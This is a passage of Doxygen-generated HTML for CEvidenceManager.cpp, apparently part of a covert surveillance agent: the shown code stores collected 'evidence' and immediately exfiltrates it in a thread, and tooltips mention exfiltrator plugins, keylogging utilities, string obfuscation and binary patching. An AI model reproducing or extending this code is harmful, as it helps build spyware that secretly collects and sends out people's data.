<div class="line"><a name="l00399"></a><span class="lineno">  399</span>&#160;    <a class="code" href="structAgentCore_1_1__EvidenceStartParams.html">EvidenceStartParams</a> pars={0};</div>
<div class="line"><a name="l00400"></a><span class="lineno">  400</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">in</a> = (<span class="keywordtype">void</span>*)json;</div>
<div class="line"><a name="l00401"></a><span class="lineno">  401</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">inSize</a> = strlen(json);</div>
<div class="line"><a name="l00402"></a><span class="lineno">  402</span>&#160;    pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">mode</a> = <a class="code" href="group__EVIDENCE__INTERNAL.html#gaaaf16ceaea6174d1762d3639f4fd72d9">EVIDENCE_ADD</a>;</div>
<div class="line"><a name="l00403"></a><span class="lineno">  403</span>&#160;    <span class="keywordtype">int</span> res = p-&gt;<a class="code" href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">start</a>(&amp;pars);</div>
<div class="line"><a name="l00404"></a><span class="lineno">  404</span>&#160;    <span class="keywordflow">if</span> (res != 0) {</div>
<div class="line"><a name="l00405"></a><span class="lineno">  405</span>&#160;        <a class="code" href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a>(<span class="stringliteral">&quot;error adding evidence, res=%d&quot;</span>, res);</div>
<div class="line"><a name="l00406"></a><span class="lineno">  406</span>&#160;    }</div>
<div class="line"><a name="l00407"></a><span class="lineno">  407</span>&#160;    <span class="keywordflow">else</span> {</div>
<div class="line"><a name="l00408"></a><span class="lineno">  408</span>&#160;        <a class="code" href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a>(<span class="stringliteral">&quot;added evidence, path=%s&quot;</span>, pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a>);</div>
<div class="line"><a name="l00409"></a><span class="lineno">  409</span>&#160; </div>
<div class="line"><a name="l00410"></a><span class="lineno">  410</span>&#160;        <span class="comment">// try to immediately exfiltrate in a separate thread!</span></div>
<div class="line"><a name="l00411"></a><span class="lineno">  411</span>&#160;        exfiltrateEvidence(pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">evidencePath</a>, pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">out</a>, pars.<a class="code" href="group__EVIDENCE__INTERNAL.html#ga711f219c1a17aa2f9e18e994962d473e">outSize</a>, <span class="keyword">true</span>);</div>
<div class="line"><a name="l00412"></a><span class="lineno">  412</span>&#160;    }</div>
<div class="line"><a name="l00413"></a><span class="lineno">  413</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00414"></a><span class="lineno">  414</span>&#160;}</div>
<div class="line"><a name="l00415"></a><span class="lineno">  415</span>&#160; </div>
</div><!-- fragment --></div><!-- contents -->
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_ad93abbe81d3b0740554dae7b85c6a617"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#ad93abbe81d3b0740554dae7b85c6a617">AgentCorePrivate::CEvidenceManager::recurrentExfiltratorThread</a></div><div class="ttdeci">void recurrentExfiltratorThread()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00295">CEvidenceManager.cpp:295</a></div></div>
<div class="ttc" id="agroup__PLUGINS__INTERNAL_html_ga98814f0ed6e9b415084070f7640af5a2"><div class="ttname"><a href="group__PLUGINS__INTERNAL.html#ga98814f0ed6e9b415084070f7640af5a2">PLUGIN_TYPE_EVIDENCE</a></div><div class="ttdeci">#define PLUGIN_TYPE_EVIDENCE</div><div class="ttdoc">a special plugin which packages evidences (originally json) in a packed/encrypted/....</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00043">IPlugin.h:42</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_adb43dab1fa8ee25a11a91b9f2ae8c9fc"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#adb43dab1fa8ee25a11a91b9f2ae8c9fc">AgentCorePrivate::CEvidenceManager::instance</a></div><div class="ttdeci">static CEvidenceManager * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00067">CEvidenceManager.cpp:67</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4fb8d399ac90102d087ca9412d29501c"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4fb8d399ac90102d087ca9412d29501c">AgentCore::_EvidenceStartParams::out</a></div><div class="ttdeci">uint8_t * out</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00030">IEvidence.h:30</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a0ece8b1f145cbe0c102e32516f883210"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a0ece8b1f145cbe0c102e32516f883210">AgentCorePrivate::CEvidenceManager::storagePath</a></div><div class="ttdeci">const char * storagePath() override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00146">CEvidenceManager.cpp:146</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CAppContext_html_ab00e23b04f5d67da7c5135ff8ca7aa7a"><div class="ttname"><a href="classAgentCorePrivate_1_1CAppContext.html#ab00e23b04f5d67da7c5135ff8ca7aa7a">AgentCorePrivate::CAppContext::rng</a></div><div class="ttdeci">BdUtils::CRNG * rng()</div><div class="ttdef"><b>Definition:</b> <a href="CAppContext_8cpp_source.html#l00198">CAppContext.cpp:198</a></div></div>
<div class="ttc" id="anamespaceAgentPlugin_html"><div class="ttname"><a href="namespaceAgentPlugin.html">AgentPlugin</a></div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00011">CEvidenceManager.h:11</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html">AgentCorePrivate::CEvidenceManager</a></div><div class="ttdoc">manages evidences, calls into the evidence and exfiltration plugins for specific agent implementation...</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00087">CEvidenceManager.h:87</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html_ab12f6f187b5d3e36d12cd284469ca31a"><div class="ttname"><a href="classBdUtils_1_1CJson.html#ab12f6f187b5d3e36d12cd284469ca31a">BdUtils::CJson::toString</a></div><div class="ttdeci">char * toString(bool prettyPrint=false)</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8cpp_source.html#l00041">CJson.cpp:41</a></div></div>
<div class="ttc" id="aCPluginBase_8cpp_html_ac294a95d63deba8831a754100349423d"><div class="ttname"><a href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a></div><div class="ttdeci">IPlugin * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00016">CPluginBase.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html">AgentPlugin::IPlugin</a></div><div class="ttdoc">exposes plugins functionality to the core's plugin manager AgentCorePrivate::CPluginManager</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00063">IPlugin.h:63</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga339499d0b71034c8546bb66d25bd066d"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga339499d0b71034c8546bb66d25bd066d">AgentCore::_EvidenceStartParams::storageSize</a></div><div class="ttdeci">uint64_t storageSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00028">IEvidence.h:28</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a949a8c4be3a4866783eb139f12fff2e7"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a949a8c4be3a4866783eb139f12fff2e7">AgentCorePrivate::CEvidenceManager::removeEvidence</a></div><div class="ttdeci">int removeEvidence(const char *path) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00101">CEvidenceManager.cpp:101</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_add0abd478aab282ec0856391bd430f90"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#add0abd478aab282ec0856391bd430f90">AgentCorePrivate::CEvidenceManager::getModEvidence</a></div><div class="ttdeci">AgentPlugin::IPlugin * getModEvidence()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00044">CEvidenceManager.cpp:44</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a103a4399425e542fa3aacadea334b256"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a103a4399425e542fa3aacadea334b256">AgentCorePrivate::CEvidenceManager::isEnabled</a></div><div class="ttdeci">bool isEnabled() override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00084">CEvidenceManager.cpp:84</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html_af15ef1aac8fc2d2637d19b6442271cdb"><div class="ttname"><a href="classBdUtils_1_1CJson.html#af15ef1aac8fc2d2637d19b6442271cdb">BdUtils::CJson::node</a></div><div class="ttdeci">JsonObject &amp; node()</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8cpp_source.html#l00089">CJson.cpp:89</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga48e7b89694845643759212d026351465"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga48e7b89694845643759212d026351465">AgentCore::_EvidenceStartParams::inSize</a></div><div class="ttdeci">int inSize</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00026">IEvidence.h:26</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga9eb6e189e7295dc2ba2af6bda819f6dc"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga9eb6e189e7295dc2ba2af6bda819f6dc">EVIDENCE_STORAGE_SIZE</a></div><div class="ttdeci">#define EVIDENCE_STORAGE_SIZE</div><div class="ttdoc">to call the evidence plugin to get the current size of the evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00047">IEvidence.h:46</a></div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html_acc8da2fca63545b8e6e2bb841b6981cb"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html#acc8da2fca63545b8e6e2bb841b6981cb">AgentPlugin::IPlugin::start</a></div><div class="ttdeci">virtual int start(void *params=nullptr)=0</div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_aa5443d7b718bdb99b6e4cb4103efbec0"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#aa5443d7b718bdb99b6e4cb4103efbec0">AgentCorePrivate::CEvidenceManager::getExfiltrators</a></div><div class="ttdeci">std::vector&lt; AgentPlugin::IPlugin * &gt; getExfiltrators()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00059">CEvidenceManager.cpp:59</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga4d1a4cebd5a893bed7f7d741b71dbc29"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga4d1a4cebd5a893bed7f7d741b71dbc29">AgentCore::_EvidenceStartParams::storagePath</a></div><div class="ttdeci">char * storagePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00027">IEvidence.h:27</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a33ab6af0d3b7b5f96874a95c048178a6"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a33ab6af0d3b7b5f96874a95c048178a6">AgentCorePrivate::CEvidenceManager::CEvidenceManager</a></div><div class="ttdeci">CEvidenceManager()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00021">CEvidenceManager.cpp:21</a></div></div>
<div class="ttc" id="anamespaceAgentCorePrivate_html"><div class="ttname"><a href="namespaceAgentCorePrivate.html">AgentCorePrivate</a></div><div class="ttdef"><b>Definition:</b> <a href="CAgentMsgUtils_8h_source.html#l00010">CAgentMsgUtils.h:10</a></div></div>
<div class="ttc" id="aclassBdUtils_1_1CJson_html"><div class="ttname"><a href="classBdUtils_1_1CJson.html">BdUtils::CJson</a></div><div class="ttdoc">json encoding/decoding utilities, based on ArduinoJson</div><div class="ttdef"><b>Definition:</b> <a href="CJson_8h_source.html#l00017">CJson.h:17</a></div></div>
<div class="ttc" id="aCCommandManager_8h_html"><div class="ttname"><a href="CCommandManager_8h.html">CCommandManager.h</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabd852dd6e48372d695a19e827694ae1b"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabd852dd6e48372d695a19e827694ae1b">EVIDENCE_REMOVE</a></div><div class="ttdeci">#define EVIDENCE_REMOVE</div><div class="ttdoc">to call the evidence plugin to remove an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00042">IEvidence.h:41</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_aaae13dba01ee5fb115ca8389f50ac11d"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#aaae13dba01ee5fb115ca8389f50ac11d">AgentCorePrivate::CEvidenceManager::exfiltrateEvidence</a></div><div class="ttdeci">void exfiltrateEvidence(char *path, uint8_t *data, int size, bool spawn=false) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00256">CEvidenceManager.cpp:256</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CAppContext_html_aa9de297be01071e73dc46b05ada0a884"><div class="ttname"><a href="classAgentCorePrivate_1_1CAppContext.html#aa9de297be01071e73dc46b05ada0a884">AgentCorePrivate::CAppContext::instance</a></div><div class="ttdeci">static CAppContext * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CAppContext_8cpp_source.html#l00013">CAppContext.cpp:13</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CPluginManager_html_aaef4e424861e3b4aeac70502c35be1e4"><div class="ttname"><a href="classAgentCorePrivate_1_1CPluginManager.html#aaef4e424861e3b4aeac70502c35be1e4">AgentCorePrivate::CPluginManager::findLoadedPluginsByType</a></div><div class="ttdeci">std::vector&lt; AgentPlugin::IPlugin * &gt; findLoadedPluginsByType(int type) override</div><div class="ttdef"><b>Definition:</b> <a href="CPluginManager_8cpp_source.html#l00106">CPluginManager.cpp:106</a></div></div>
<div class="ttc" id="aCPluginManager_8h_html"><div class="ttname"><a href="CPluginManager_8h.html">CPluginManager.h</a></div></div>
<div class="ttc" id="agroup__PLUGINS__INTERNAL_html_ga69cec44b1cd1764894339faa86ebcf0f"><div class="ttname"><a href="group__PLUGINS__INTERNAL.html#ga69cec44b1cd1764894339faa86ebcf0f">PLUGIN_TYPE_EXFILTRATOR</a></div><div class="ttdeci">#define PLUGIN_TYPE_EXFILTRATOR</div><div class="ttdoc">a special plugin to exfiltrate evidences</div><div class="ttdef"><b>Definition:</b> <a href="IPlugin_8h_source.html#l00048">IPlugin.h:47</a></div></div>
<div class="ttc" id="abdutils_8h_html"><div class="ttname"><a href="bdutils_8h.html">bdutils.h</a></div></div>
<div class="ttc" id="aCLog_8h_html_a111656e99a3f411e44b064c32a0d55af"><div class="ttname"><a href="CLog_8h.html#a111656e99a3f411e44b064c32a0d55af">DBGLOGW</a></div><div class="ttdeci">#define DBGLOGW(...)</div><div class="ttdoc">prints WARNING debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00059">CLog.h:58</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CConfigManager_html_a1a8ccc831017ddde2f752ba078b4cc61"><div class="ttname"><a href="classAgentCorePrivate_1_1CConfigManager.html#a1a8ccc831017ddde2f752ba078b4cc61">AgentCorePrivate::CConfigManager::core</a></div><div class="ttdeci">JsonObject &amp; core() override</div><div class="ttdef"><b>Definition:</b> <a href="CConfigManager_8cpp_source.html#l00169">CConfigManager.cpp:169</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_ae73bd7cd3668f2a439031e46eb583f7e"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#ae73bd7cd3668f2a439031e46eb583f7e">AgentCorePrivate::CEvidenceManager::~CEvidenceManager</a></div><div class="ttdeci">~CEvidenceManager()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00025">CEvidenceManager.cpp:25</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a6833a578790c66c9c8f45d3523451844"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a6833a578790c66c9c8f45d3523451844">AgentCorePrivate::CEvidenceManager::initializeEvidenceJson</a></div><div class="ttdeci">BdUtils::CJson * initializeEvidenceJson(const char *type, uint32_t cmdId=0, uint32_t batchid=0) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00319">CEvidenceManager.cpp:319</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaf7722a418bb9513d53b5f63a1f45b660"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaf7722a418bb9513d53b5f63a1f45b660">AgentCore::_EvidenceStartParams::evidencePath</a></div><div class="ttdeci">char * evidencePath</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00029">IEvidence.h:29</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga9fd73bd75e66453d42897b6efacbb319"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga9fd73bd75e66453d42897b6efacbb319">EVIDENCE_STORAGE_PATH</a></div><div class="ttdeci">#define EVIDENCE_STORAGE_PATH</div><div class="ttdoc">to call the evidence plugin to get the path of the evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00052">IEvidence.h:51</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a1ef3f3b695d93f3bbb693f3c8197cf79"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a1ef3f3b695d93f3bbb693f3c8197cf79">AgentCorePrivate::CEvidenceManager::enable</a></div><div class="ttdeci">void enable(bool capture) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00074">CEvidenceManager.cpp:74</a></div></div>
<div class="ttc" id="anamespaceBdUtils_html"><div class="ttname"><a href="namespaceBdUtils.html">BdUtils</a></div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8h_source.html#l00016">CPluginBase.h:16</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gab3661827a38a2a99bb944c5a873f98b4"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gab3661827a38a2a99bb944c5a873f98b4">AgentCore::_EvidenceStartParams::mode</a></div><div class="ttdeci">int mode</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00024">IEvidence.h:24</a></div></div>
<div class="ttc" id="aCDevice_8h_html_a773c5a27ae7a792622fc7e766e4778fe"><div class="ttname"><a href="CDevice_8h.html#a773c5a27ae7a792622fc7e766e4778fe">DEVICE_ID_SIZE</a></div><div class="ttdeci">#define DEVICE_ID_SIZE</div><div class="ttdoc">size of the device unique id, 32 bytes</div><div class="ttdef"><b>Definition:</b> <a href="CDevice_8h_source.html#l00020">CDevice.h:19</a></div></div>
<div class="ttc" id="aCLog_8h_html_a6116789398e26a1c2bc635117a2e4960"><div class="ttname"><a href="CLog_8h.html#a6116789398e26a1c2bc635117a2e4960">DBGLOGE</a></div><div class="ttdeci">#define DBGLOGE(...)</div><div class="ttdoc">prints ERROR debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00063">CLog.h:62</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gaaaf16ceaea6174d1762d3639f4fd72d9"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gaaaf16ceaea6174d1762d3639f4fd72d9">EVIDENCE_ADD</a></div><div class="ttdeci">#define EVIDENCE_ADD</div><div class="ttdoc">to call the evidence plugin to add an evidence</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00038">IEvidence.h:37</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a36949042a633149027199ae3e41c3e31"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a36949042a633149027199ae3e41c3e31">AgentCorePrivate::CEvidenceManager::walkEvidences</a></div><div class="ttdeci">int walkEvidences() override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00166">CEvidenceManager.cpp:166</a></div></div>
<div class="ttc" id="aCLog_8h_html_a2b5d27a6100113b1a09dce32f08b6f07"><div class="ttname"><a href="CLog_8h.html#a2b5d27a6100113b1a09dce32f08b6f07">DBGLOGI</a></div><div class="ttdeci">#define DBGLOGI(...)</div><div class="ttdoc">set to enable debug messages on release builds</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00055">CLog.h:54</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a60d91f6312a54e46a1c083d9efef8dae"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a60d91f6312a54e46a1c083d9efef8dae">AgentCorePrivate::CEvidenceManager::init</a></div><div class="ttdeci">int init()</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00088">CEvidenceManager.cpp:88</a></div></div>
<div class="ttc" id="anamespaceAgentCore_html"><div class="ttname"><a href="namespaceAgentCore.html">AgentCore</a></div><div class="ttdef"><b>Definition:</b> <a href="CKeylogUtils_8h_source.html#l00012">CKeylogUtils.h:12</a></div></div>
<div class="ttc" id="aobfuscate_8h_html_aeb960253580086e334d4f65300c10256"><div class="ttname"><a href="obfuscate_8h.html#aeb960253580086e334d4f65300c10256">vxENCRYPT</a></div><div class="ttdeci">#define vxENCRYPT(Str)</div><div class="ttdoc">compile-time encrypt string (release build only)</div><div class="ttdef"><b>Definition:</b> <a href="obfuscate_8h_source.html#l00097">obfuscate.h:96</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_aef07ebc986685e7f77a62c59cb654600"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#aef07ebc986685e7f77a62c59cb654600">AgentCorePrivate::CEvidenceManager::addEvidence</a></div><div class="ttdeci">int addEvidence(const char *json) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00387">CEvidenceManager.cpp:387</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_ab34fe43e5a70c9ef2a01a9668aaff803"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#ab34fe43e5a70c9ef2a01a9668aaff803">AgentCorePrivate::CEvidenceManager::exfiltrateRoutine</a></div><div class="ttdeci">void exfiltrateRoutine(char *path, uint8_t *data, int size, uint32_t threadId)</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00199">CEvidenceManager.cpp:199</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_adf1615fd208f9b7b44277f43c500f354"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#adf1615fd208f9b7b44277f43c500f354">AgentCorePrivate::CEvidenceManager::addCommandResultEvidence</a></div><div class="ttdeci">int addCommandResultEvidence(int res, const char *resStr, uint32_t cmdId, uint32_t batchId=0) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00352">CEvidenceManager.cpp:352</a></div></div>
<div class="ttc" id="aCMutex_8h_html_a945e98d6eab62f3906153938a8156e30"><div class="ttname"><a href="CMutex_8h.html#a945e98d6eab62f3906153938a8156e30">MUTEX_GUARD</a></div><div class="ttdeci">#define MUTEX_GUARD(m)</div><div class="ttdoc">mutex wrapper, wraps the inner mutex with std::lock_guard to provide RAII behaviour:  attempts to gra...</div><div class="ttdef"><b>Definition:</b> <a href="CMutex_8h_source.html#l00021">CMutex.h:20</a></div></div>
<div class="ttc" id="aCLog_8h_html_a989e37701588731748694b31a0b424db"><div class="ttname"><a href="CLog_8h.html#a989e37701588731748694b31a0b424db">DBGLOGV</a></div><div class="ttdeci">#define DBGLOGV(...)</div><div class="ttdoc">prints VERBOSE debug log</div><div class="ttdef"><b>Definition:</b> <a href="CLog_8h_source.html#l00067">CLog.h:66</a></div></div>
<div class="ttc" id="aclassAgentPlugin_1_1IPlugin_html_aab688fb06a6019325e46a27ea8e1189e"><div class="ttname"><a href="classAgentPlugin_1_1IPlugin.html#aab688fb06a6019325e46a27ea8e1189e">AgentPlugin::IPlugin::isInitialized</a></div><div class="ttdeci">virtual bool isInitialized()=0</div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_a509aeea251df54360894930a94795d11"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#a509aeea251df54360894930a94795d11">AgentCorePrivate::CEvidenceManager::currentStorageSize</a></div><div class="ttdeci">int currentStorageSize(uint64_t *size) override</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8cpp_source.html#l00125">CEvidenceManager.cpp:125</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CBinaryPatch_html_a69c49d2ab4e0acd6c7b433e6b81d0169"><div class="ttname"><a href="classAgentCorePrivate_1_1CBinaryPatch.html#a69c49d2ab4e0acd6c7b433e6b81d0169">AgentCorePrivate::CBinaryPatch::instance</a></div><div class="ttdeci">static CBinaryPatch * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CBinaryPatch_8cpp_source.html#l00016">CBinaryPatch.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CAgentMsgUtils_html_a42eac2a197c3b8dfd47e4c27008898f4"><div class="ttname"><a href="classAgentCorePrivate_1_1CAgentMsgUtils.html#a42eac2a197c3b8dfd47e4c27008898f4">AgentCorePrivate::CAgentMsgUtils::body</a></div><div class="ttdeci">static JsonObject &amp; body(JsonObject &amp;js)</div><div class="ttdef"><b>Definition:</b> <a href="CAgentMsgUtils_8cpp_source.html#l00009">CAgentMsgUtils.cpp:9</a></div></div>
<div class="ttc" id="astructAgentCore_1_1__EvidenceStartParams_html"><div class="ttname"><a href="structAgentCore_1_1__EvidenceStartParams.html">AgentCore::_EvidenceStartParams</a></div><div class="ttdoc">evidence and exfiltrator plugins AgentPlugin::IPlugin::start() will be called with a pointer to this ...</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00023">IEvidence.h:23</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CEvidenceManager_html_ad5d4212e121a23e86a97db352ceaf5cb"><div class="ttname"><a href="classAgentCorePrivate_1_1CEvidenceManager.html#ad5d4212e121a23e86a97db352ceaf5cb">AgentCorePrivate::CEvidenceManager::_instance</a></div><div class="ttdeci">static CEvidenceManager * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CEvidenceManager_8h_source.html#l00127">CEvidenceManager.h:127</a></div></div>
<div class="ttc" id="aclassAgentCorePrivate_1_1CPluginManager_html_a4f345322bbf09583ec9e1c354b716767"><div class="ttname"><a href="classAgentCorePrivate_1_1CPluginManager.html#a4f345322bbf09583ec9e1c354b716767">AgentCorePrivate::CPluginManager::instance</a></div><div class="ttdeci">static CPluginManager * instance()</div><div class="ttdef"><b>Definition:</b> <a href="CPluginManager_8cpp_source.html#l00017">CPluginManager.cpp:17</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga20360a0574745e71136d9fef2da48f93"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga20360a0574745e71136d9fef2da48f93">AgentCore::_EvidenceStartParams::in</a></div><div class="ttdeci">void * in</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00025">IEvidence.h:25</a></div></div>
<div class="ttc" id="aCAppContext_8h_html"><div class="ttname"><a href="CAppContext_8h.html">CAppContext.h</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_gabf196e25206d836cd8e6cf3e8664ba94"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#gabf196e25206d836cd8e6cf3e8664ba94">EVIDENCE_WALK</a></div><div class="ttdeci">#define EVIDENCE_WALK</div><div class="ttdoc">to call the evidence plugin to enumerate the collected evidences and call a callback for each</div><div class="ttdef"><b>Definition:</b> <a href="IEvidence_8h_source.html#l00057">IEvidence.h:56</a></div></div>
